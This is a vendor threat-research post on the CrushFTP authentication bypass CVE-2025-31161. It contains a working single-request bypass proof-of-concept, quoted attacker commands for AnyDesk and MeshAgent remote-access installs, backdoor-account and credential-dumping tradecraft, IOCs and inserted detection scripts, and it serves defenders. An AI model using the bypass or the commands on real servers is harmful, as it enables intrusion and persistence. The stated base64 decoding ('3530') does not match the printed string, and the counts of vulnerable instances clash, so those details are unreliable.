CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation


TL;DR: CVE-2025-31161 is a critical severity vulnerability that lets attackers control how user authentication is handled by the CrushFTP managed file transfer (MFT) software. Affected versions are 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0; we strongly recommend patching immediately. Successful exploitation of CVE-2025-31161 gives attackers admin-level access across the CrushFTP application for further compromise. This blog outlines our re-created proof-of-concept for CVE-2025-31161 and attackers’ use of both legitimate and malicious RMM tooling for post-exploitation activities.


Special thanks to Tim Kasper, Faith Stratton, Jose Oregon, Matt Anderson, Craig Sweeney, Alden Schmidt, Lindsey Welch, Harlan Carvey, Jamie Levy, and John Hammond for their contributions and support for this analysis.


On 3 April 2025, Huntress observed in-the-wild exploitation of CVE-2025-31161, an authentication bypass vulnerability in versions of the CrushFTP software. We uncovered further post-exploitation activity leveraging the MeshCentral agent and other malware, which we discuss in this writeup. During further analysis, we uncovered potential evidence of compromise as early as 30 March 2025, which appeared to be access testing and did not spawn any external processes from CrushFTP.

In a recent post, the Shadowserver team stated that as of March 30 there were ~1,500 vulnerable instances of CrushFTP publicly exposed to the internet.



Figure 1: Tweet from Shadowserver Foundation on March 31, 2025


What is CVE-2025-31161? 

CVE-2025-31161 is a critical severity vulnerability (CVSS 9.8) that affects how the CrushFTP file transfer application handles user authentication. At the time of writing, the NIST NVD entry gives this description:

CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.

This vulnerability is patched in CrushFTP versions 11.3.1+ and 10.8.4+. Huntress has validated and confirmed that the authentication bypass is prevented in patched versions.

Please ensure your own installations of CrushFTP are updated to the latest versions. If your CrushFTP instance is publicly exposed to the open Internet, we strongly recommend you patch immediately.

Upon successful exploitation, an adversary may gain access to the administrator user account for the CrushFTP application, and leverage this to create new backdoor accounts, access files (upload and download), obtain code execution, and achieve full control of the vulnerable server.

The vulnerability was assigned a CVE on March 26, and the Shadowserver Foundation first reported CVE-2025-31161 exploitation activity on March 31. The exploitation of CVE-2025-31161 is indicative of a concerning trend that we’ve seen across several incidents, where threat actors are targeting MFT platforms as a way to deliver disruptive attacks. These platforms are typically external-facing and house sensitive enterprise data, making them a favorite for threat actors. As such, prompt patching is critical. Within our partner base we have seen 148 unique endpoints with the CrushFTP software installed as a service, with 95 of these running major versions 10 and 11. Approximately 72 different companies within our customer base were running unpatched versions of CrushFTP. Customers have been notified of the urgency to upgrade.

Numerous other security firms have discussed CVE-2025-31161 (hat tip to Rapid7 AttackerKB and Outpost24 amongst others) and thanks to their shared insights, Huntress was able to recreate a proof-of-concept (PoC) with ease. The core of this vulnerability is the S3 authentication functionality included as a part of CrushFTP. Due to logic bugs in the underlying source code (which Project Discovery did a fantastic job outlining), a mere Authorization header in an HTTP request is all that is needed to bypass authentication without valid username or password credentials.


Proof of concept 

Since the technical details of the proof of concept are already public and available, we have no concerns discussing the inner workings of our recreated proof-of-concept.

As stated, it boils down to just one HTTP request:

GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1111111111_111111111111111111111111111111111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Connection: close

While this is a simple example to merely list users on the CrushFTP instance, it demonstrates the key components:

  • Backend functions are accessible and any administrative actions can be performed

  • A single cookie, CrushAuth must be provided

    • This does not have to be a valid CrushAuth cookie. The Project Discovery writeup discusses the typical structure of this value, but we have seen success with just a ~31 character string of alphanumeric characters.

    • The c2f HTTP parameter must match the last 4 values of the CrushAuth cookie.

  • The Authorization header relies on the specific string prefix AWS4-HMAC-SHA256, and the Credential field may be set to any valid CrushFTP user account name that does not include a tilde (~), followed by a forward slash (/).

    • You will most commonly see the username crushadmin as this is the typical default administrator for CrushFTP servers.

In testing, we observed the CrushAuth cookie must still be “known” to the CrushFTP instance -- so a second HTTP request may be necessary if a random/invalid value is forged.

This small proof-of-concept only demonstrates the web-based authentication bypass; an adversary would expand on it with further actions and exploitation. In the following sections, we discuss the tradecraft and post-exploitation used by the threat actors leveraging this vulnerability in the wild.


Huntress observations 

Across our Huntress partner base, the CrushFTP software is most typically installed within its own program directory, commonly placed at the root of a volume (e.g., C:\CrushFTP10 or C:\CrushFTP11, but also seen on D:\, E:\, or other drive letters).

Inside this directory is a CrushFTP.log file, which includes valuable information. In our testing, we used CrushFTP version 10.5.1_12. We have found the CrushFTP.log file to be the most reliable source for determining the full running version number of the CrushFTP installation. As an example, you may see a log entry like the following:

SERVER|<TIMESTAMP>|Server Memory Stats: <......> :Version 10.5.1_12

If you are unsure which CrushFTP version you are running, be sure to check this file. Additionally, you can review it for signs of exploitation using some of the indicators we have observed below. These are the few log lines we observed when testing the recreated authentication bypass referenced above:

ACCEPT|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:lookup:8080] Accepting connection from: <ATTACKER-IP-ADDRESS>:<EPHEMERAL-PORT>
POST|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:crushadmin:<ATTACKER-IP-ADDRESS>] WROTE: *HTTP/1.1 200 OK*

Bear in mind, this is only a test of bypassing authentication to act as the crushadmin user -- follow-on exploitation may look very different. There is nuance in what artifacts may be found in the logs, depending on the requests made -- if you see activity including the AWS4-HMAC-SHA256 Credential=crushadmin/ string, be sure to look around the entry to make sure there is no reference to a currentAuth cookie value. The currentAuth cookie is included in legitimate login sessions and is not used for the authentication bypass technique.
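The two checks described above (reading the running version out of CrushFTP.log and spotting S3-style Authorization headers that arrive without a currentAuth cookie) as an added example; this is not Huntress tooling, the sample log lines are constructed to approximate the layout quoted in this post, and the connection-tag and header-grouping logic is an assumption about how CrushFTP lays out its READ lines:

```python
import re

# Affected ranges per the advisory: 10.0.0-10.8.3 and 11.0.0-11.3.0 inclusive; the _<build> suffix is ignored.
AFFECTED = [((10, 0, 0), (10, 8, 3)), ((11, 0, 0), (11, 3, 0))]
VERSION_RE = re.compile(r":Version (\d+)\.(\d+)\.(\d+)")
CONN_RE = re.compile(r"\[(HTTP:[^:\]]+)")  # [HTTP:1_51234:crushadmin:203.0.113.5] -> HTTP:1_51234
READ_RE = re.compile(r"READ: \*(.*?)\*")

# Constructed sample, approximating the CrushFTP.log layout quoted in this post.
SAMPLE_LOG = """\
SERVER|04/03/2025 10:00:01 AM|Server Memory Stats: heap=128M :Version 10.5.1_12
POST|04/03/2025 10:00:02 AM|[HTTP:1_51234:crushadmin:203.0.113.5] READ: *GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1*
POST|04/03/2025 10:00:02 AM|[HTTP:1_51234:crushadmin:203.0.113.5] READ: *Cookie: CrushAuth=1111111111_111111111111111111111111111111111*
POST|04/03/2025 10:00:02 AM|[HTTP:1_51234:crushadmin:203.0.113.5] READ: *Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/*
POST|04/03/2025 10:05:00 AM|[HTTP:2_51300:alice:198.51.100.7] READ: *POST /WebInterface/function/ HTTP/1.1*
POST|04/03/2025 10:05:00 AM|[HTTP:2_51300:alice:198.51.100.7] READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
""".splitlines()

def parse_version(log_lines):
    """(major, minor, patch) from the 'Server Memory Stats' line, or None."""
    found = [m for m in map(VERSION_RE.search, log_lines) if m]
    return tuple(int(x) for x in found[0].groups()) if found else None

def is_affected(version):
    return version is not None and any(lo <= version <= hi for lo, hi in AFFECTED)

def _check(cid, hdrs, hits):
    # Bypass signature from this post: S3-style Authorization header but no currentAuth cookie (no real login session).
    s3_auth = any(h.startswith("Authorization: AWS4-HMAC-SHA256") for h in hdrs)
    session = any(h.startswith("Cookie:") and "currentAuth=" in h for h in hdrs)
    if s3_auth and not session:
        hits.append((cid, hdrs[0]))

def find_bypass_requests(log_lines):
    """Group READ lines per connection into requests; return (conn, request line) hits."""
    requests, hits = {}, []
    for line in log_lines:
        conn, read = CONN_RE.search(line), READ_RE.search(line)
        if not conn or not read:
            continue
        cid, text = conn.group(1), read.group(1)
        if re.match(r"(GET|POST) ", text):  # a request line starts a new request
            if cid in requests:
                _check(cid, requests.pop(cid), hits)
            requests[cid] = [text]
        elif cid in requests:
            requests[cid].append(text)
    for cid, hdrs in requests.items():
        _check(cid, hdrs, hits)
    return hits
```

Run it over a real CrushFTP.log by replacing SAMPLE_LOG with the file's lines; the second connection in the sample carries a currentAuth cookie and is correctly left alone.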

Additionally, we have seen log files present in the \logs\session_logs directory that may include further details for your own analysis if you believe you may have been compromised.

Here is one occurrence where the threat actor created a new admin account to use as a persistent backdoor:


[Embedded Gist (log excerpt) not captured]

There are a few things to call out in the log excerpt above:


  1. Note the first two lines, which match the pattern of our recreated PoC artifacts -- and the observed adversary IP address, 172.235.144[.]67.

  2. They leverage the setUserItem function to craft a new user with specified properties. In this case, the backdoor account name is Eaion6Mz.

  3. They change the new user’s password, likely so they could log in later with it.

  4. One neat trick: they set the new user’s last_login time to 06/08/2023 03:04:22 PM in an effort to hide the account by making it look like it was last used years ago.

On another affected host, we observed the threat actor upload and stage the MeshCentral agent to be leveraged for continued remote access, persistence, and further post-exploitation. Other incidents leveraged AnyDesk and one included more bespoke malware. 

We will discuss these in further details in the following sections.

Huntress has seen exploitation of CVE-2025-31161 across only four distinct hosts from four different companies. Three of these companies were hosted by the same MSP. The affected companies included marketing, retail, and semiconductor businesses. While only a small number of our customers were affected, there are known to be 130,000 vulnerable instances left open and exposed to the Internet outside of our purview. Therefore, the true impact of this vulnerability is still yet to be determined.


AnyDesk post-exploitation

On one host, Huntress observed a threat actor installing a malicious AnyDesk RMM instance post-exploitation, before moving to dump the SAM and System registry hives in an effort to harvest credentials.

The host appeared to be running a vulnerable version of CrushFTP; the threat actors then installed AnyDesk via the CrushFTPService.exe process. The following commands were observed setting the stage for the AnyDesk install:

cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"

cmd.exe /c "echo licence_key123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --register-licence"

cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"


Figure 2: Process detection for AnyDesk spawning from CrushFTPService.exe



Figure 3: Process detection for credential dumping with reg.exe


MeshAgent post-exploitation

On some hosts, the threat actor was observed deploying MeshAgent as part of the post-exploitation activity. MeshAgent is the agent of the legitimate open-source remote monitoring platform MeshCentral, and has previously been used by threat actors for various remote access functionalities, like sending commands, maintaining persistence, and more. The following activity was observed staging the MeshAgent installation.

From the CrushFTP log of one endpoint:

Accepting connection from: 2.58.56.16:50860
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 783*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *Priority: u=0*
READ: *command:openFile*
READ: *upload_path:/Windows/Temp/mesch.exe*
READ: *upload_size:3480944*
READ: *upload_id:cisqUUw66Yte*
READ: *start_resume_loc:0*
READ: *c2f:odaJ*
WROTE: *150 Opening BINARY data connection. Ready to write file /Windows/Temp/mesch.exe. S T O R*
WROTE: *HTTP/1.1 200 OK*
...
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:cisqUUw66Yte*
READ: *total_chunks:6*
READ: *total_bytes:3480944*
READ: *filePath:/Windows/Temp/mesch.exe*
READ: *lastModified:1743685342000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:3480944 bytes @ 1699K/sec. MD5=114c196c39c91575880a5012d06565b1*
WROTE: *226 Transfer complete. MD5=114c196c39c91575880a5012d06565b1 ("/Windows/Temp/mesch.exe" 3480944) STOR*
WROTE: *HTTP/1.1 200 OK*
WROTE: *Content-Length: 138*
WROTE: **
WROTE: *<?xml version="1.0" encoding="UTF-8"?> <commandResult><response></response><md5>114c196c39c91575880a5012d06565b1</md5></commandResult>*
WROTE: *HTTP/1.1 200 OK*

Note the presence of a currentAuth cookie here -- this indicates the adversary had leveraged CVE-2025-31161 to bypass authentication, but then used that access to log in with a legitimate session.

Once the file was on the endpoint, the following commands were observed via EDR telemetry:

C:\Windows\Temp\mesch.exe run

C:\Windows\Temp\mesch.exe b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5jb25uZWN0KCczNjg3Jyk7

C:\Windows\Temp\mesch.exe -fullinstall

The base64 string in the second command decodes to: 

require('win-console').hide();require('win-dispatcher').connect('3530');

On other detected endpoints the MeshAgent post-exploitation installation was identical to the above, except that on one endpoint the base64 string decoded to:

require('win-console').hide();require('win-dispatcher').connect('4204');

Soon after the MeshAgent was deployed, a console window was opened (see above), which then added a non-admin user (CrushUser) to the local administrators group:

Figure 4: Signals Showing Post-Exploitation Activities


Telegram bot malware analysis

Within this affected host’s CrushFTP.log file (notice the STOR command for uploading the malicious DLL):

READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:SE13PFVmTlq0*
READ: *total_chunks:6*
READ: *total_bytes:4358656*
READ: *filePath:/Windows/Temp/d3d11.dll*
READ: *lastModified:1743586788000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:4358656 bytes @ 2128K/sec. MD5=1ab5a915e306686a1c7bebd03563a977*
WROTE: *226 Transfer complete.  MD5=1ab5a915e306686a1c7bebd03563a977 ("/Windows/Temp/d3d11.dll" 4358656) STOR*

After MeshAgent’s installation, another DLL was pulled onto the host. While we didn’t observe execution of this DLL, we can gain some high-level insight from it. It’s a large C++ binary built on the open-source TgBot library. Unfortunately, at this time we weren’t able to recover the bot token used by this particular sample, as it is likely stored in an external configuration file.

Figure 5: C++ Classes in DLL

In addition to the sample being unstripped, it also included PDB information, which is a useful pivot for finding more associated samples:

Figure 6: PDB Information

This allowed us to find 3 more DLLs that are likely written by the same author, all of which were uploaded to VirusTotal within the last week.

  • 85a1bfebf2a5973ebecd6e5a58c8fab18edfead2c1680ec1e9cce902924c347e

  • f7c8be827f3bd98b30c5a8d23c1af77f3d0324a9ebcd90104134fc1971751ff7

  • be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e

While the true intent of this sample still isn’t clear, it is likely that the threat actors are making use of a Telegram bot to collect telemetry from infected hosts. This analysis will be updated as more information becomes available.


What is Huntress doing?

Post-exploitation efforts are already thoroughly covered by Huntress detection rules. In response to these intrusions specifically, we crafted detectors to find child processes invoked underneath the CrushFTP service executable:


[Embedded Gist (detector rule) not captured]
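The detection logic this section describes, as an added example rather than the Huntress detector itself: every child of CrushFTPService.exe is reported, and the command line is further tagged with the AnyDesk, reg.exe and MeshAgent patterns seen in this post. The process events are constructed (not real telemetry), the C:\CrushFTP10 service path is assumed, and the tag names are my own.

```python
import re

SERVICE_EXE = re.compile(r"\\CrushFTPService\.exe$", re.I)
# Command-line patterns for the tradecraft described in this post (tag names are my own labels).
TAGS = [
    ("anydesk_silent_install", re.compile(r"--install\b.*--silent\b", re.I)),
    ("anydesk_set_password", re.compile(r"anydesk\.exe.*--set-password", re.I)),
    ("anydesk_register_licence", re.compile(r"anydesk\.exe.*--register-licence", re.I)),
    ("reg_hive_dump", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b", re.I)),
    ("meshagent_install", re.compile(r"\s(-fullinstall\b|b64exec\s)", re.I)),
]

# Constructed process-creation events, not real telemetry; the command lines follow the
# ones quoted in this post, and the service install path is hypothetical.
EVENTS = [
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"'},
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"'},
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save hklm\sam C:\windows\temp\sam.hiv"},
    {"parent": r"C:\CrushFTP10\CrushFTPService.exe", "image": r"C:\Windows\Temp\mesch.exe",
     "cmdline": r"C:\Windows\Temp\mesch.exe -fullinstall"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir"},
]

def classify(event):
    """Tags for one event: [] unless the parent is the CrushFTP service executable.

    Every child of CrushFTPService.exe gets 'crushftp_child' (that parent-child link is
    the common thread in the incidents above); further tags name the matched tradecraft."""
    if not SERVICE_EXE.search(event["parent"]):
        return []
    return ["crushftp_child"] + [name for name, pat in TAGS if pat.search(event["cmdline"])]

def scan(events):
    """Return (tags, command line) for every event worth alerting on."""
    return [(tags, e["cmdline"]) for e in events if (tags := classify(e))]
```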


For community members not yet protected with Huntress, there are two Sigma rules available in the public SigmaHQ repository:

  1. “Remote Access Tool - MeshAgent Command Execution via MeshCentral”

  2. “Remote Access Tool - AnyDesk Silent Installation”

If you think you could be impacted, abuse our trial to quickly discover anything shady left behind.


Indicators of Compromise (IOCs)

Indicator | First Observed (YYYY-MM-DD) | Description
172.235.144[.]67 | 2025-04-03 | Attacker IP Address
2.58.56[.]16 | 2025-04-03 | Attacker IP Address
Eaion6Mz | 2025-04-03 | Backdoor Account Name
C:\Windows\Temp\d3d11.dll (SHA256 be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e) | 2025-04-03 | TgBot DLL
C:\Windows\Temp\mesch.exe (SHA256 9036c92c3ca73cb6ec2da25035322554319288fd2f6db906413011873ad7e281) | 2025-04-03 | MeshAgent Installer Binary

